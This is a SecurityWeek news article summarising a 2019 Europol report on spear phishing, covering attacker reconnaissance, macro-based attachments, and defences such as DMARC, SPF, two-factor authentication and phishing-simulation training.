Security Experts:

Europol on Methodology Behind Successful Spear Phishing Attacks

"Spear phishing... remains the principal attack vector for most cybercrimes," says Europol in a new report. Sixty-five percent of targeted attack groups use it as their primary infection vector, while 32% of breaches involve phishing. During 2018, up to 0.55 % of all incoming emails were phishing emails, while phishing was present in 78% of cyber espionage incidents.

In its attempt to alleviate cybercrime, Europol has established advisory groups for financial services, communication providers and internet security. It meets with private sector partners in these advisory groups to discuss industry-specific cybercrime threats and trends to enable development and cooperation on joint public/private action plans.

Over two days in March 2019, 70 global financial institutions, internet security firms, and telecommunications providers met and shared insights on phishing. Now Europol has published (PDF) the outcome of that meeting in what it describes as "a unique, law enforcement-industry view on the threat of spear phishing."

Steven Wilson, Head of Europol's European Cybercrime Centre commented: "Spear phishing is a major enabler of some of the most serious forms of cybercrime, especially ransomware, and can cause real harm to European citizens and organisations. We can only tackle a threat of this scale effectively by working closely with key partners from across industry. The EC3 Advisory Groups and this report are a reflection of our ongoing cooperation to tackle the threat from cybercrime."

The report largely ignores scatter-gun, spam-based phishing campaigns. These are more easily detected and blocked. A reconnaissance-based targeted attack against a specific individual is a different matter. The problem is that the reconnaissance phase is simple and requires no technical expertise. Primarily, phishers' data comes from two sources -- the target company's own online presence, and the phish recipient's personal information from social media accounts.

From the first, a key source is the job listings that companies post. "A typical vacancy notice," says Europol, "not only covers detailed descriptions of the tasks and responsibilities for a specific role in the organisation in question (processes), but also often includes information about whom the job holder reports to and manages (structure), as well as what skills and knowledge are needed (software)." From social media accounts, the attackers can learn personal interests and hobbies, and relationships with colleagues within the target organization. All that then remains for a compelling spear phishing attack is the target's email address -- and this can usually be obtained, or reliably guessed, by services such as hunter.io.

The attack phase involves persuading the target that the email has come from a trusted source or person. This means sending it from an email address belonging to the company (the basis of BEC attacks, and the newer variant known as vendor email compromise); or from a false look-alike domain. The email itself will either seek to send the recipient to a phishing website (seeking to collect credentials or deliver malware), persuade the recipient to download and open a malicious file, or it will include a weaponized attachment that the recipient is persuaded to open. 

Forty-eight percent of malicious attachments are now Office documents and will contain fileless macro-based attacks that leave no malware file on the endpoint that can be detected by anti-malware signature engines. In this type of attack, the entire purpose of the well-constructed and well-researched email is to persuade the recipient to accept the email and allow any macros to run.

Europol believes that defense against spear phishing is a combination of technical solutions and user awareness. The technical solutions are a combination of policy and software. Policy solutions include approaches that disable uncertified macros and enforce two-factor authentication; but also include more complex policies such as establishing a Sender Policy Framework (SPF) in the DNS, and implementing Domain Message Authentication Reporting and Conformance (DMARC). The latter is a widely recommended solution to phishing (or more specifically, phishing that involves the company's own brand), but has had patchy take-up so far.

Europol's own Internet Organised Crime Threat Assessment 2019 report (PDF), published in October 2019) states, "according to one study, DMARC adoption is non-existent at 80% of organisations." Without widespread adoption, DMARC offers little protection against the wider phishing problem.

The report does not highlight any specific anti-phishing software solutions, but does list some of the elements that go into such products and can also be directly used by companies. These include blocking known malicious IP addresses using domain blocking lists, and blocking emails that ask for credentials or other personal information. It also notes that "with the continuous progress made in artificial intelligence and machine learning, it may well be possible to use these techniques to help optimise successful detection and filtering of even sophisticated phishing attacks." Noticeably, however, one school of thought suggests that machine learning will never be the best solution to spear-phishing because the data pool from which the machine learns is too small for the accuracy it needs. This is not a universally held opinion.

The user awareness solution to spear phishing is given some prominence. This lists the type of phishing clues that users can be taught to recognize. It adds that awareness and education can "be achieved by systematically attacking users with real case scenarios by means of a phishing simulation (phish your own employee) with appropriate follow-up steps taken depending on the click-through-rates (CTRs) of the staff (increasing difficulty for good performers and providing tailored guidance for others)."

There is no doubt that the 'simulated phishing' market for readymade products is expanding rapidly. Despite this, a survey conducted by GetApp in September 2019 found that only 30% of companies conduct any phishing testing on their staff. Furthermore, it is unclear whether improving the phish training regimes will not result in new problems. A separate report from Agari suggests that user-reported phishing attempts are rising at a far faster rate than security staff levels can adequately handle. Many of these reported phishing attempts are false positives, but all need to be investigated. With increased time pressure on the staff triaging these reports, there is increased danger that some genuine phishing attempts will slip through.

The danger in using automated phish training is that it can persuade users to report anything even slightly suspicious, even if it is not. Indeed, the Europol report stresses, "If in doubt, the email should be forwarded as an attachment to a dedicated contact point within the targeted organisation." Since the user doesn't necessarily know whether it is an actual phish or a targeted simulated phish, he or she seems to be flagging the email as a phish for fear of failing the test.

While there are policy, technology and training solutions that can help mitigate the spear phishing threat, it doesn't seem as if any are foolproof. Spear phishing, already perhaps the major threat to businesses, will continue to grow. Noticeably, in the final section of the report, Europol almost seems to be getting its excuses into the body of its own report. It concerns the loss of WHOIS data following the activation of GDPR. "WHOIS information no longer being directly available for law enforcement, public safety agencies and cyber security researchers," it warns, "significantly harms the public interest, the rule of law online and undermines efforts to investigate and prevent cybercriminal spear phishing campaigns."

Related: Iranian Hackers Update Spear-Phishing Techniques in Recent Campaign 

Related: Facebook Awards $100,000 Prize for Spear-Phishing Detection Method 

Related: Phishing Attacks Hit the C-Suite With High Value Scams 

view counter
Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.